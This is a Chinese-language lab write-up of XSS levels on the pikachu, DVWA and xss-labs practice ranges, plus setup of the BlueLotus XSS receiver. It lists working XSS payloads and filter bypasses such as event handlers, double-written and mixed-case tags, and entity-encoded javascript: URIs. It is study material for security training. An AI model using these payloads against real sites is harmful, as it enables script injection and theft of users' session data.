w25 web漏洞之xss

pikachu靶场

第一关-反射型xss（get）

利用hpp漏洞破解

第二关-反射型xss（post）

登录：admin / 123456
修改postdata内的参数

第三关-存储型xss

在留言板输入message=<script>alert(1)</script>

第四关-DOM型xss

what do you see? 是把输入框内的内容拼接url。

常见XSS语句标签,<a>
 <a href=javascript:alert('xss') > xss</a>
 <a href="" onclick="alert(1)"> xss</a>

第五关-DOM型xss

跟第四关一样

dvwa靶场

第一关-xss(Reflected)

思路：源码中对

#level:medium
<a href=javascript:alert(1)>123</a> //截图就是使用该命令
或
<scrip<script>t>alert(1)</scrip<script>t> //双写
或
<scripT>alert(1)</scripT> //大小写
或
# level：high
<input onfocus="alert(1);">
或
<img src="x" onerror=alert(1)> 
或
<button onclick="alert(1)">text</button>

第二关-xss(Stored)

跟第一关同理，可利用大小写。比较简单

#level:medium & high
<img src="x" onerror=alert(1)>

第三关

xss-labs靶场

第一关

通过修改name后面的值

第二关

结束前一个标签

"><scripT>alert(1)</scripT>

第三关

.htmlspecialchars
把预定义的字符转换为HTML实体，预定义的字符是&、'、"、<、>
<?php
$str = "This is some <b>bold</b> text.";
echo htmlspecialchars($str);
?>
输出结果
This is some <b>bold</b> text.

绕过预定义的字符，使用事件
' οnfοcus=alert(1);'

第四关

会把<（小于号）、>（大于号）都替换为空，思路跟第三关一样

" οnclick=alert(); "

第五关

里面会对<scri字符做特殊处理

"><a href=javascript:alert(1)>123</a>

第六关

大小写

第七关

会把script给替换为空，此时第一反应是双写

"><scripscriptt>alert(1)</scripscriptt>

第八关

对双引号和单引号进行转义

将keyword进行html实体编码，https://config.net.cn/tools/HtmlEncode.html
javascript:alert(1)  进行html实体编码（十进制），结果如下
javascript:alert(1)

第九关

提示你的链接不合法？

在第八关的基础上，添加http的网址，但是需要注释掉
javascript:alert(1)/*http://baidu.com*/

第十关

主要是把隐藏的输入框展示出来

" οnfοcus=alert();  type="text"

蓝莲花（BlueLotus_XSSReceiver-master）靶场

靶场安装

在小皮上创建网站，设置域名为www.xssblue.cn,然后访问安装网址（www.xssblue.cn/index.php）,直接点击安装

访问dvwa靶场，获取xss（Reflected）的网址（http://dvwa:7001/vulnerabilities/xss_r/）

在BlueLotus平台创建js模块，

点击生成payload，复制

将复制的编码粘贴到dvwa网站中的name文本框，点击submit。

在BlueLotus平台的首页（http://www.xssblue.cn/admin.php）查看接收信息，有则存在xss漏洞。

xss的思维导图（https://www.edrawmax.cn/online/share.html?code=2e98d082c6f211eebef32d7bb088ee74）